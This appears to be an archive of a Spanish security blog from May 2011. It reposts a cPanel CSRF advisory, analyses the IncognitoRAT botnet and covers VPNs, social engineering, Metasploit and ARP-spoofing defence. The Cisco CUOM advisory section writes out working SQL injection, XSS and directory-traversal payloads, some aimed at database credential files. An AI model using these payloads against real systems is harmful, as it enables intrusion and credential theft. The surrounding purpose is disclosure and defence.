RSS

Exploit para cPanel - Cortesía de Exploit-DB

martes, 31 de mayo de 2011

# Exploit Title: cPanel < 11.25 CSRF - Add php script
# Date: 27.05.2011
# Author: ninjashell
# Software Link: http://cpanel.net
# Version: 11.25 (see details below)
# Tested on: Linux
# CVE : N/A
Como prueba de concepto real, pueden utilizar una shell escrita en php, pueden descargarla de http://phpshell.sourceforge.net/ o bien utilizar la Shell disponible en backtrack.

I. Introduction
cPanel versions below and excluding 11.25 , are vulnerable to CSRF which leads to uploading a PHP script of the attackers liking. If you have turned off security tokens and referrer security check, no matter what version you are using, you are vulnerable as well.

II. Proof of concept (PoC)





Afterwards simply check for ninjashell.php in the directory.


III. Counter-measures
All cPanel versions starting from 11.25 and above have two in-built security features to prevent such attacks - security tokens and referrer security check. This means that if you are a cpanel client, you should update your software.


IV. About the author.
- Ethical hacker;
- Freelance security consultant/penetration tester;
- Security researcher in the spare time;
- Over 12 years of experience;
You can always email me ninjashellmail@gmail.com or follow me on twitter

@ninjashell1337

Libro-PDF: Esquema Nacional de Seguridad con Tecnología Microsoft

jueves, 26 de mayo de 2011

Microsoft Ibérica publica el libro "Esquema Nacional de Seguridad con Tecnología Microsoft", también disponible en formato PDF de forma gratuita. Es un trabajo eminentemente divulgativo, dirigido a los responsables técnicos de las administraciones, encargados de cumplir los requisitos y las recomendaciones del Esquema. Igualmente se presenta como una importante guía práctica para todos aquellos que estén involucrados en el diseño y despliegue de políticas de seguridad con tecnologías Microsoft.

El Real Decreto 3/2010, de 8 de enero, regula el Esquema Nacional de Seguridad (ENS) en el ámbito de la administración electrónica, previsto en el artículo 42 de la Ley 11/2007, de 22 de junio, de acceso electrónico de los ciudadanos a los Servicios Públicos. El ENS tiene por objeto establecer la política de seguridad en la utilización de medios electrónicos y está constituido por principios básicos y requisitos mínimos que permitan una protección adecuada de la información.

El libro está escrito por Juan Luis G. Rambla y José María Alonso Cebrián de Informática64, bajo la coordinación de Héctor Sánchez Montenegro, National Technology Officer de Microsoft Ibérica. En los prólogos cuenta con las aportaciones de María Garaña, Presidenta de Microsoft España; Víctor M. Izquierdo Loyola, Director General de INTECO; Fernando de Pablo, Director General para el Impulso de la Administración Electrónica del Ministerio de Política Territorial y Administración Pública; y Javier García Candau, Subdirector General Adjunto en funciones del Centro Criptológico Nacional.

La versión PDF del mismo está disponible de forma gratuita para su descarga en la siguiente dirección:
http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-59-70-ENS/2262.esquema_5F00_nacional_5F00_seguridad_5F00_ok.pdf

Índice de contenidos

Capítulo 1. Antecedentes
Capítulo 2. El Esquema Nacional de Seguridad
2.1. Principios básicos
2.2. Requisitos mínimos
2.3. Comunicaciones electrónicas
2.4. Auditoría de seguridad
2.5. Respuesta a incidentes de seguridad
2.6. Adecuación tras la entrada en vigor del ENS
2.7. Régimen sancionador
Capítulo 3. Principios de seguridad: seguridad por defecto
Capítulo 4. Dimensiones de seguridad
4.1. Disponibilidad
4.2. Autenticidad
4.3. Integridad
4.4. Confidencialidad
4.5. Trazabilidad
4.6. Niveles de la dimensión de seguridad
Capítulo 5. Medidas de seguridad. Naturaleza de las medidas
5.1. Marco organizativo
5.2. Marco operacional
5.3. Medidas de protección
Capítulo 6. La implementación del ENS con tecnología Microsoft
6.1. Control de acceso
6.1.1. Identificación
6.1.2. Requisitos de acceso
6.1.3. Segregación de funciones y tareas
6.1.4. Proceso de gestión de derechos de acceso
6.1.5. Mecanismos de autenticación
6.1.6. Acceso local
6.1.7. Acceso remoto
6.2. Explotación
6.2.1. Gestión y configuración de activos
6.2.2. Protección y prevención frente a incidencias
6.2.3. Sistemas de registros y gestión de logs
6.3. Protección de los equipos
6.4. Protección de los soportes de información
6.5. Protección de las comunicaciones
6.5.1. Perímetro seguro
6.5.2. Protección de la confidencialidad
6.5.3. Protección de la autenticidad y la integridad
6.5.4. Segregación de redes
6.5.5. Medios alternativos
6.6. Protección de las aplicaciones informáticas
6.7. Protección de la información
6.8. Protección de los servicios
6.8.1. Protección del correo electrónico
6.8.2. Protección de servicios y aplicaciones web [mp.s.2]
6.8.3. Protección frente a la denegación de servicios
6.8.4. Medios alternativos
Capítulo 7. Premios, reconocimientos y certificaciones de los productos
Microsoft
Capítulo 8. Seguridad y privacidad en la nube
8.1. Seguridad y privacidad: un proceso integral y continuo
8.2. Sistemas de gestión de Microsoft y control de acceso
8.3. Eventos y actividades de registro
8.4. Certificados estándar de cumplimiento
8.5. Guía de cliente para políticas de cumplimiento
8.6. Data centers, procesador y controlador de datos


IncognitoRAT - Una mirada a una nueva botnet

miércoles, 25 de mayo de 2011

Los creadores de IncognitoRAT (una botnet que se ha puesto relativamente de moda en estos últimos días) han programado una herramienta muy completa para controlar una botnet multiplataforma. Pero parece que han dado muestras de no saber asegurar sus servidores... de forma que se pueden obtener los datos de los supuestos compradores.

Advierto que todos estos datos pueden no ser exactos o tan precisos como nos gustaría, puesto que no hemos hecho (todavía) una estricta ingeniería inversa sobre las muestras. En cualquier caso, teniendo en cuenta todo el ruido generado en torno a IncognitoRAT, intentaremos aportar algo nuevo.

IncognitoRAT ha generado muchas noticias en medios generalistas en los últimos días. Sobre todo porque se ha anunciado que es multiplataforma (creado en Java) e infecta a Mac OS X. En realidad esto no es noticia, porque existen ya varias herramientas RAT o malware en general para Mac y para cualquier otro sistema operativo (a ver si desterramos estos mitos cuanto antes). Y en realidad, tampoco es un dato exacto. Todo está programado en Java, eso es cierto, pero el agente que infecta se ha visto solamente en forma de ejecutable para Windows... Lo que a nosotros nos llama la atención no es que IncognitoRAT permita con su código Java activar la cámara de la víctima, hacer que suene un MP3... sino sobre todo, su curioso recelo comercial... que parece que no han cuidado demasiado.

Como en todo este tipo de kits para crear botnets, existe un programa para generar el agente "infector" por un lado, y un panel de control por otro. Conseguí el "Incognito RAT Client" y al contrario que otros kits de botnets, este exige presentarse en la red de la propia "compañía" que comercializa la herramienta (TeamHAVOC).

En la pestaña de "Request Auth" se requiere una autenticación basada en contraseña y además en dos parámetros HWID. Parece tratarse de un hash único por máquina en base al hardware y no puede ser modificado. El número de transacción puede tratarse del código que identifique el haber realizado el pago (para que los creadores originales sepan que eres un comprador legítimo del kit). El resto de datos son de control general de la botnet.

Cuando se envía esa información, el programa se conecta con Gmail para mandar un correo. Se supone que, con los datos introducidos, se pondrá en contacto con los creadores para validar la compra y la cuenta. Este es un movimiento curioso. Habitualmente los creadores de estas herramientas piden dinero por ellas, pero no controlan de esta forma al comprador (con identificadores de hardware, etc) y así, quien se tope con una herramienta comprada por otro, podría usarla sin problemas. No es este el caso. Es necesario que el servidor de TeamHAVOC esté activo e incluso usar el cliente en una misma máquina siempre, como consecuencia de los HWID (aunque seguro que esto puede eludirse).

En la otra pestaña, en la que se supone que uno se presenta cuando ya tiene usuario y contraseña validados (TeamHAVOC se asegura que has pagado), es donde está lo interesante. Introduje unos datos al azar y comprobé el tráfico de red.

Vista la imagen, el siguiente paso estaba claro... y aquí es donde empieza el "full disclosure".

El cliente de la herramienta valida los datos recopilados durante la presentación del usuario contra su propio servidor (incognitorat.com). Los archivos son texto claro.

Las contraseñas no están en texto claro... y md5crack.com no ayuda. Sólo sé que una de ellas es compartida con alguien más en el mundo...

Y a partir de ahí, se puede llegar hasta unos paquetes de software que no sé si deberían estar accesibles (desde el punto de vista del negocio de incognitorat.com). Se trata de actualizaciones para la herramienta, que analizaremos en otro momento. Un vistazo a la web no ofrece mucha más información.

De todos los dominios de tercer nivel (no-ip, habitualmente) que se observan en la página, casi todos responden. Descargando de la base de datos de VirusTotal un infector, descubro que las máquinas infectadas suelen contactar con puertos en torno al 400-500. Por ejemplo,

telnet riskygambler.no-ip.org 457

Responde con un protocolo que en principio, no he identificado.

Supongo que eliminarán pronto el acceso a esos datos (aunque sean falsos o inútiles, no dan buena imagen). Si son reales, se concluye que el producto ha tenido un éxito relativo... (¿solo cuatro cuentas activas?) y que el "gestor de autenticación" en el servidor no es muy eficaz. En la base de datos de VirusTotal encontramos pocas referencias a estas herramientas (sí a los infectores). Al menos por firmas los antivirus parecen no detectarlo demasiado. Incluso, esos archivos que cuelgan del servidor, todavía no han sido enviados a VirusTotal en el momento de escribir estas líneas.

Como curiosidad adicional, este recomendable vídeo, muestra como alguien se presenta a la red de IncognitoRAT y utiliza el nombre de usuario "beastint", que no se encuentra en los servidores "oficiales" en este momento (el vídeo está grabado el 3 de abril).

En conclusión, resulta interesante el método de validación de compra que utiliza esta red, aunque después de programar una herramienta tan compleja, han fallado en lo más sencillo. En cualquier caso, no sé si los datos de los usuarios serán ciertos, si se trata de simples pruebas que no han eliminado, o si lo expuesto ha sido descubierto ya por alguien más... Pero como dice el propio EULA de la herramienta... esto está realizado con propósitos educacionales.


Navegación web Encriptada mediante VPN's

martes, 24 de mayo de 2011

Hoy les traigo dos software bastantes útiles (hoy un colega me preguntó de este tema, le respondo por acá) al momento de realizar navegación web en redes públicas, tales como startbucks, redes de proveedores o hotpot públicos.


El primero:
Hotspot Shield es un software de VPN (Virtual Private Network por sus siglas en Ingles) desarrollado por Anchorfree que te permite hacer una conexión segura encriptando tu información. Las conexiones de una Red Privada Virtual son como hacer un túnel entre tu computadora y el sitio de conexión. Esta implementación es muy utilizada en empresas que quieren darle seguridad a la información que se maneja entre sus servidores y terminales que están fuera del área de la red local (la red física de la empresa), puedes hacerte una mejor idea con la siguiente imagen:



Si estamos navegando desde un Hotspot de un lugar público como un hotel, una universidad, o un café, podremos estar tranquilos porque nuestro datos viajan codificados por medio del túnel que se a creado entre el servidor y nosotros, aunque los datos sean intersectados no podrán hacer nada con ellos ya que están encriptados. El funcionamiento del hotspot Shield es muy simple, basta con descargarlo desde su página oficial, instalarlo en nuestro sistema (de momento solo está disponible para Windows, 2000, XP, Vista y para Mac OS X Leopart y Tiger) seguido de esto basta con iniciar el programa este nos abre una página en la cual le damos "Run HotSpot Shield" y nos aparecerá algo como esto:



Donde podemos conectarnos al VPN y nos muestran algunos datos de esa conexión (desde cuando está conectado, cuanto has enviado y descargado etc…) esto es lo único que tendremos que hacer, el HotSpot Shield se encarga de configurar nuestros navegadores(probado con Firefox e Internet Explorer) para que podamos navegar de forma segura y anonima desde donde queramos. Este software es de gran utilidad ya que no solo codifica y vuelve anónima nuestra conexión, sino que al tener una ip externa estadounidense podremos entrar a distintos sitios en los que las ip's de este país tienen privilegios por ejemplo megaupload, o pandora (que ahora solo se puede acceder desde usa). En fin una excelente utilidad que ayudara un poco a mantenernos anónimos en la red… que la disfruten. PD. si nos desconectamos y nos volvemos a utilizar obtendremos otra ip de estados unidos totalmente diferente (muy útil para rapidshare x ejemplo).

El segundo:
proXPN es un software de VPN (Virtual Private Network por sus siglas en Ingles) gratuito que te permite realizar una conexión segura y anónima entre nosotros e Internet, cifrando la información que recibas o transmitas por ella. Las conexiones de una Red Privada Virtual son como hacer un túnel entre tu computadora y el sitio de conexión. Esta implementación es muy utilizada en empresas que quieren darle seguridad a la información que se maneja entre sus servidores y terminales que están fuera del área de la red local (la red física de la empresa).

Si estamos navegando con proXPN en un lugar público como un hotel, una universidad, o un café, podremos estar "tranquilos" porque nuestro datos viajan codificados (con 2048 Bits) por medio del túnel que se ha creado entre el servidor y nosotros, aunque los datos sean interceptados no podrán hacer nada con ellos ya que estos se encuentran cifrados, puedes hacerte una mejor idea sobre el funcionamiento de proXPN con el siguiente vídeo:

http://www.youtube.com/watch?v=ONpttV7o9Oc&feature=player_embedded

Para utilizar proXPN, basta con descargarlo desde su página oficial, instalarlo en nuestro sistema (de momento solo disponible para Windows, Mac OS X e iPhone) seguido de esto basta con iniciar el programa, nos aparecerá un icono en la barra de estado, donde debemos darle en conectar, metemos nuestro datos de acceso (si no tienes cuenta, puedes crearla desde el mismo software) y una vez el icono del proXPN quede en verde, podremos navegar de forma segura y anónima desde donde queramos.

Este software es de gran utilidad ya que no solo codifica y vuelve anónima nuestra conexión, sino que al tener una ip externa estadounidense podremos entrar a distintos sitios en los que las ip's de este país tienen algún privilegio, por ejemplo megaupload, o pandora (que ahora solo se puede acceder desde usa). En fin una excelente utilidad que ayudara un poco a mantenernos anónimos en la red… que la disfruten.

Ingeniería Social - Técnicas y Mitigación

Después de hablar un rato sobre ingeniería social, encontré este articulo bastante ilustrativo, que les permitirá entender los riesgo de la técnica más antigua para vulnerar sistemas humanos ;-) espero sea de su interés y para sus organizaciones.

Hoy en día, uno de los activos más valiosos para las organizaciones es la información. Compartir información con otras entidades, sugiere la mayoría de las veces una invasión de la privacidad.

Por ello, las instituciones (gubernamentales, educativas, financieras, etc.) buscan la manera de implementar controles de seguridad para proteger su información, como circuitos de cámaras, cajas fuertes, firewalls, etc., medidas que además resultan costosas.

Sin embargo, hay un recurso inseguro que almacena información muy sensible: la mente humana. Ya sea por olvido o por el reto que implica asegurar la información dentro de las cabezas de sus empleados, las organizaciones no le prestan mucha atención a este aspecto.

Sin importar cuántos candados físicos o lógicos haya para proteger un activo, al dar acceso a una persona, siempre existirá un riesgo humano presente, y por tanto, vulnerable a ingeniería social.

¿Qué es la Ingeniería Social?
La Ingeniería Social es el acto de manipular a una persona a través de técnicas psicológicas y habilidades sociales para cumplir metas específicas. Éstas contemplan entre otras cosas: la obtención de información, el acceso a un sistema o la ejecución de una actividad más elaborada (como el robo de un activo), pudiendo ser o no del interés de la persona objetivo.

La Ingeniería Social se sustenta en un sencillo principio: “el usuario es el eslabón más débil”. Dado que no hay un solo sistema en el mundo que no dependa de un ser humano, la Ingeniería Social es una vulnerabilidad universal e independiente de la plataforma tecnológica. A menudo, se escucha entre los expertos de seguridad que la única computadora segura es la que esté desenchufada, a lo que, los amantes de la Ingeniería Social suelen responder que siempre habrá oportunidad de convencer a alguien de enchufarla.

La Ingeniería Social es un arte que pocos desarrollan debido a que no todas las personas tienen “habilidades sociales”. Aun así, hay individuos que desde pequeños han demostrado tener la aptitud y con un poco de entrenamiento convertirla en el camino ideal para realizar acciones maliciosas. Por ejemplo, hay crackers que en vez de perder horas rompiendo una contraseña, prefieren conseguirla preguntando por teléfono a un empleado de soporte técnico.

 

Formas de ataque
Las formas de ataque son muy variadas y dependen de la imaginación del atacante y sus intereses. En general, los ataques de Ingeniería Social actúan en dos niveles: el físico y el psicosocial. El primero describe los recursos y medios a través de los cuales se llevará a cabo el ataque, y el segundo es el método con el que se engañará a la víctima.
Las formas usadas a nivel físico son:
·         Ataque por teléfono. Es la forma más persistente de Ingeniería Social. En ésta el perpetrador realiza una llamada telefónica a la víctima haciéndose pasar por alguien más, como un técnico de soporte o un empleado de la misma organización. Es un modo muy efectivo, pues las expresiones del rostro no son reveladas y lo único que se requiere es un teléfono.

·         Ataque vía Internet. Desde que Internet se volvió uno de los medios de comunicación más importantes, la variedad de ataques en red se incrementaron tanto como la gran cantidad de servicios que existen en él. Los ataques más comunes son vía correo electrónico (obteniendo información a través de un phishing o infectando el equipo de la víctima con malware), web (haciendo llenar a la persona objetivo un formulario falso) o inclusive conversando con personas específicas en salas de chat, servicios de mensajería o foros.

·         Dumpster Diving o Trashing (zambullida en la basura). Consiste en buscar información relevante en la basura, como: agendas telefónicas, organigramas, agendas de trabajo,  unidades de almacenamiento (CD’s, USB’s, etc.), entre muchas otras cosas.    

·         Ataque vía SMS. Ataque que aprovecha las aplicaciones de los celulares. El intruso envía un mensaje SMS a la víctima haciéndola creer que el mensaje es parte de una promoción o un servicio, luego, si la persona lo responde puede revelar información personal, ser víctima de robo o dar pié a una estafa más elaborada.

·         Ataque vía correo postal. Uno de los ataques en el que la víctima se siente más segura, principalmente por la fiabilidad del correo postal. El perpetrador envía correo falso a la víctima, tomando como patrón alguna suscripción de una revista, cupones de descuento, etc. Una vez que diseña la propuesta para hacerla atractiva, se envía a la víctima, quien si todo sale bien, responderá al apartado postal del atacante con todos sus datos.

·         Ataque cara a cara. El método más eficiente, pero a la vez el más difícil de realizar. El perpetrador requiere tener una gran habilidad social y extensos conocimientos para poder manejar adecuadamente cualquier situación que se le presente. Las personas más susceptibles suelen ser las más “inocentes”, por lo que no es un gran reto para el atacante cumplir su objetivo si elige bien a su víctima.

Por otro lado, existen entornos psicológicos y sociales que pueden influir en que un ataque de ingeniería social sea exitoso. Algunos de ellos, son:

·         Exploit de familiaridad”. Táctica en que el atacante aprovecha la confianza que la gente tiene en sus amigos y familiares, haciéndose pasar por cualquiera de ellos. Un ejemplo claro de esto ocurre cuando un conocido llega a una fiesta con uno de sus amigos. En una situación normal nadie dudaría de que ese individuo pudiera no ser de confianza. Pero ¿de verdad es de fiar alguien a quien jamás hemos tratado?

·         Crear una situación hostil. El ser humano siempre procura alejarse de aquellos que parecen estar locos o enojados, o en todo caso, salir de su camino lo antes posible. Crear una situación hostil justo antes de un punto de control en el que hay vigilantes, provoca el suficiente estrés para no revisar al intruso o responder sus preguntas.

·         Conseguir empleo en el mismo lugar. Cuando la recompensa lo amerita, estar cerca de la víctima puede ser una buena estrategia para obtener toda la información necesaria. Muchas pequeñas y medianas empresas no realizan una revisión meticulosa de los antecedentes de un nuevo solicitante, por lo que obtener un empleo donde la víctima labora puede resultar fácil.

·         Leer el lenguaje corporal. Un ingeniero social experimentado puede hacer uso y responder al lenguaje corporal. El lenguaje corporal puede generar, con pequeños, detalles una mejor conexión con la otra persona. Respirar al mismo tiempo, corresponder sonrisas, ser amigable, son algunas de las acciones más efectivas. Si la víctima parece nerviosa, es bueno reconfortarla. Si está reconfortada, ¡al ataque!

·         Explotar la sexualidad. Técnica casi infalible. Las mujeres que juegan con los deseos sexuales de los hombres, poseen una gran capacidad de manipulación, ya que el hombre baja sus defensas y su percepción. Probablemente suene asombroso, pero es aprovechar la biología a favor.

¿Cómo defenderse contra la Ingeniería Social?
La mejor manera de enfrentar el problema, es concientizar a las personas al respecto (GESTION DE LA DIFUSIÓN COMO LO DICE ITIL). Educarles sobre seguridad y fomentar la adopción de medidas preventivas. Otros mecanismos sugeridos son:

·         Nunca divulgar información sensible con desconocidos o en lugares públicos (como redes sociales, anuncios, páginas web, etc.) (PODRIAN UTILIZAR NEXT GENERATION FIREWALL).
·         Si se sospecha que alguien intenta realizar un engaño, hay que exigir se identifique y tratar de revertir la situación intentando obtener la mayor cantidad de información del sospechoso (CONTROLES DE ACCESO A LAS EMPRESAS).
·         Implementar un conjunto de políticas de seguridad en la organización que minimice las acciones de riesgo (SGSI).
·         Efectuar controles de seguridad física para reducir el peligro inherente a las personas (NO SOLO UNA CAMAR IP ES DE UTILIDAD).
·         Realizar rutinariamente auditorías y pentest usando Ingeniería Social para detectar huecos de seguridad de esta naturaleza (ES A LO QUE ME REFIERO SIEMPRE, PENTESTING AL USUARIO PARA VER SU COMPORTAMIENTO).
·         Llevar a cabo programas de concientización sobre la seguridad de la información. (GESTION DE LA DIFUSIÓN COMO LO DICE ITIL).

 

Conclusiones
La seguridad de la información no sólo debe entenderse como un conjunto de elementos técnicos y físicos, sino como un proceso cultural de personas y organizaciones. Si el usuario es el eslabón más débil, deben existir controles que ayuden a disminuir el riesgo que éste pueda representar.

Kevin Mitnick, el hacker más reconocido a nivel mundial y experto en Ingeniería Social, concluye: “Puedes gastar una fortuna en tecnología y servicios… y como sea, tu infraestructura de red podría estar vulnerable a la forma más vieja de manipulación”.

Ahora que conoces más sobre la ingeniería social y la seguridad de la información, la próxima vez que sientas que tu información está completamente segura, recuerda que no todas las intrusiones son siempre tan obvias. 

Club de Seguridad CLCERT/McAffee: Iphone Internals

lunes, 23 de mayo de 2011

Estimados, desde el CLCERT nos invitan en Chile a:


*Evento: "Club de Seguridad CLCERT/McAffee: Iphone Internals"*



Lugar: *Auditorio DCC*, 3to piso, Depto. de Cs. de la Computación, Av.
Blanco Encalada 2120, Santiago.


Fecha: *Miércoles 25 de Mayo 2011*


Hora: *12:00 a 14:00 horas*


Descripción
=========== 

En la presentación se explicarán algunos conceptos fundamentos de la arquitectura del sistema operativo iPhone OS y de la arquitectura de procesador ARM. También se explicarán una técnica para insertar código desde un proceso a otro, de cómo enganchar funciones y métodos, y de cómo combinar estas dos técnicas para interceptar mensajes encriptados enviados o recibidos por otros procesos.


Habrá pizza y bebidas.


Acerca del Club de Seguridad
============================

Este evento es co-organizado por el recientemente instalado Laboratorio de Seguridad de McAfee en Santiago y el CLCERT (http://www.clcert.cl/) el Grupo de Criptografía y Seguridad de la Facultad. Las reuniones del Club tienen como propósito presentar y discutir temas interesantes y técnicos relacionados con seguridad computacional, tales como análisis de vulnerabilidades y análisis/forensica de malware, entre otros. Además, se busca promover la participación de los estudiantes, por lo que se dispondrá de tiempo para hacer preguntas y discutir/proponer nuevas ideas y/o líneas de investigación en el tema de seguridad computacional.

Múltiples vulnerabilidades en Cisco Unified Operations Manager

Cisco ha publicado una actualización para Cisco Unified Operations Manager que corrige diversos fallos de seguridad que podrían permitir que un atacante conseguir acceso a información sensible, manipular datos o ejecutar código script.

Se han identificado múltiples vulnerabilidades en Cisco Unified Operations Manager (CUOM), que pueden ser empleadas para inyectar código script o consultas SQL. Los problemas se deben a errores de validación de entradas en "ServerHelpEngine", "PRTestCreation.do", "TelePresenceReportAction.do" y otros scripts, que pueden emplearse para construir ataques de cross site scripting y de inyección SQL.

Los usuarios de Cisco pueden conseguir actualizaciones para estos problemas a través de Software Center en:
http://www.cisco.com/cisco/software/navigator.html?a=a&i=rpm

Información del impacto:

Información referente al exploit:

1. Blind SQL injection vulnerabilities that affect CuOM CVE-2011-0960 (CSCtn61716):
The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call:

/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=

Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote:
/iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--

2. Reflected XSS vulnerabilities that affect CuOM CVE-2011-0959 (CSCtn61716):
/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c06d&deviceCapability=deviceCap
/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870d5&viewname=device.filter&operation=getFilter&dojo.preventCache=1298518961028
/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>09520eb762c&dojo.preventCache=1298518963370
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3balert(1)//608ddbf972
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3balert(1)//79877affe89
/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae4c
/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7
Reflected XSS vulnerability that affect Common Services Device Center CVE-2011-0962 (CSCto12712):
/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)//4e9adfb2987
Reflected XSS vulnerability that affects Common Services Framework Help Servlet CVE-2011-0961 (CSCto12704):
/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1

3. Directory traversal vulnerability that affects CiscoWorks Homepage CVE-2011-0966 (CSCto35577):
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini

cmfDBA user database info:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties

DB connection info for all databases:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties

Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.

DB password change log:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\log\dbpwdChange.log

Solution.
Upgrade to CuOM 8.6. Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and CSCto35577 for information on patches and availability of fixes. 

Investigación de Websense sobre los problemas de seguridad que enfrentan los responsables de TI

jueves, 19 de mayo de 2011

En esta última investigación realizada por Websense y Osterman Research, el 74% de los encargados de tomar decisiones de TI ven el malware como un problema creciente en 2011. De los encuestados, en los últimos 12 meses, la mayoría sufrió una infiltración de malware a través de la navegación por la Web y la situación no fue mejor para las infecciones de malware a través del email.

Con el aumento de ataques de vectores cruzados y la rápida desaparición del perímetro de la red, en Websense reconocen los hallazgos clave identificados por la investigación Osterman.

Este white paper [PDF] es valioso porque no sólo define la escala del desafío de defender los bienes de las organizaciones, sino que también describe lo que los profesionales de seguridad de TI deben considerar como una respuesta a este nuevo panorama de seguridad. Aunque continuo pensando que gran parte de estas brechas de seguridad se deben a la falta de conocimiento de los usuarios finales, más y más vectores de ataque basados en Ingeniería social salen día a día.

Algunas cosas relevantes del documento:




Se require Next Generation Firewall para poder determinar de forma real, como se están comportando los usuarios de nuestras organizaciones:



Este documento describe las amenazas que enfrentan las organizaciones de spam, malware y otros amenazas dirigidas a la mensajería y la web. El estudio fue patrocinado por Websens y se utiliza una encuesta realizada por Osterman Research (Buenos pappers), así como la información de una variedad de otras fuentes de datos.

Fuente: Websense
 

ofuscación de archivos PDF

miércoles, 18 de mayo de 2011

El siguiente video es una de las charlas dadas en la Rooted CON 2011, tema muy interesante al momento de realizar ingeniería social, una conferencia de seguridad informática que se realiza en España. El exponente es José Miguel Esparza de S21sec y habla sobre la ofuscación y las técnicas de evasión en archivos PDF.

Es una presentación muy interesante, básicamente lo que muestra es como un documento infectado y detectado por la mayoría de los antivirus, puede volverse indetectable realizando algunas modificaciones en el código:


José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files (Rooted CON 2011) from rootedcon on Vimeo.


Espero que esta información les sea de utilidad.

Metasploit 3.7.1 Liberada

martes, 17 de mayo de 2011

Desde Metasploit informan:

We are happy to announce the immediate availability of version 3.7.1 of the Metasploit Framework, Metasploit Express, and Metasploit Pro. This is a relatively small release focused on bug fixes and performance improvements.

Notable highlights include an improved IPv6 reverse_tcp stager from Stephen Fewer, a performance improvement for HTTP services (client-side modules), a bug fix to channel support in the PHP Meterpreter, an update to MSFGUI, and various small tweaks to the included modules. In addition, this release adds exploit modules for the VLC Media Player and the ICONICS WebHMI ActiveX control (SCADA), as well as a new ARP Poisoning auxiliary module.

More details about the open source release can be found in the 3.7.1 Release Notes. As always, the latest version is available from the Metasploit download page.

Metasploit Express and Metasploit Pro users will note an immediate performance improvement to the user interface as well as minor bug fixes to the Exploits and Vulnerabilities Live Report. Applying the latest software update from the Administration menu will apply the 3.7.1 upgrade. The full release notes can be found online at 3.7.1 Release Notes.

Saludos.

Mitigar MITM de ARP

lunes, 16 de mayo de 2011

ArpON es un programa que pretende securizar ARP para mitigar ataques de tipo Man In The Middle (MITM) mediante ARP Spoofing/Poisoning, además de detectar y bloquear ataques derivados más complejos del estilo de DHCP Spoofing, DNS Spoofing, WEB Spoofing, Session Hijacking y SSL/TLS Hijacking.

Está pensado para funcionar en modo demonio, y actualmente está adaptado para sistemas GNU/Linux, Mac OS X, FreeBSD, NetBSD y OpenBSD.

Podemos encontrarlo en los repositorios de algunas distribuciones de GNU/Linux, o descargarlo desde su sitio web, donde hace unos pocos días publicaron la versión 2.2.

Implementa los siguientes algoritmos:
- SARPI - Static ARP inspection: Redes sin DHCP. Utiliza una lista estática de entradas y no permite modificaciones.

- DARPI - Dynamic ARP inspection: Redes con DHCP. Controla peticiones ARP entrantes y salientes, cachea las salientes y fija un timeout para la respuesta entrante.

- HARPI - Hybrid ARP inspection: Redes con o sin DHCP. Utiliza dos listas simultáneamente.

Una vez instalado la activación no es muy compleja. Tendremos que editar su fichero de configuración (/etc/default/arpon en Debian) para definir un algoritmo, la interfaz, el log y fijar el inicio en el arranque.

En modo DARPI, el log nos informa de las peticiones ARP entrantes que podrían ser un ataque, su bloqueo, y las peticiones verídicas.

12:12:35 - Wait link connection on wlan0...
12:12:43 - DARPI on dev(wlan0) inet(192.168.1.2) hw(ca:fe:ca:fe:ca:fe)
12:12:43 - Deletes these Arp Cache entries: # Al inicio se borran las entradas.
12:12:43 - 1) 192.168.1.1 -> fa:ba:da:fa:ba:da
12:12:43 - Cache entry timeout: 500 milliseconds.
12:12:43 - Realtime Protect actived! # Protección activada.
12:12:44 - Reply << Delete entry # Intentos de ARP Spoofing (entradas no verídicas). 192.168.1.1 -> fa:ba:da:fa:ba:da
12:12:54 - Reply << Delete entry 192.168.1.1 -> fa:ba:da:fa:ba:da
12:13:04 - Reply << Delete entry 192.168.1.1 -> fa:ba:da:fa:ba:da
12:13:06 - Request >> Add entry 192.168.1.1 # Petición propia de refresco.
12:13:06 - Reply << Refresh entry 192.168.1.1 -> be:be:be:be:be:be # Entrada verídica (respuesta dentro del timeout).

En mi caso no ha funcionado bien el arranque al inicio, ya que no detectaba la interfaz. Además, prefiero elegir en qué interfaz activar la protección y cuando, por lo que he hecho un script para lanzarlo cuando lo desee (algoritmo DARPI).

#!/bin/bash if [ $# -ne 1 ]; then echo "Help: enable-arpon interface" echo " Ex: enable-arpon eth0" else /usr/sbin/arpon -q -f /var/log/arpon/arpon.log -g -d -i $1 fi

Como bien comentan en la documentación, la protección ideal sería tener todas las interfaces de la red protegidas con ArpON para conseguir una protección bidireccional en las comunicaciones.

Sin duda, un demonio que no debería faltar en ninguna máquina que se pasee por redes extrañas de cuando en cuando.

Espero que sea de utilidad esta información…

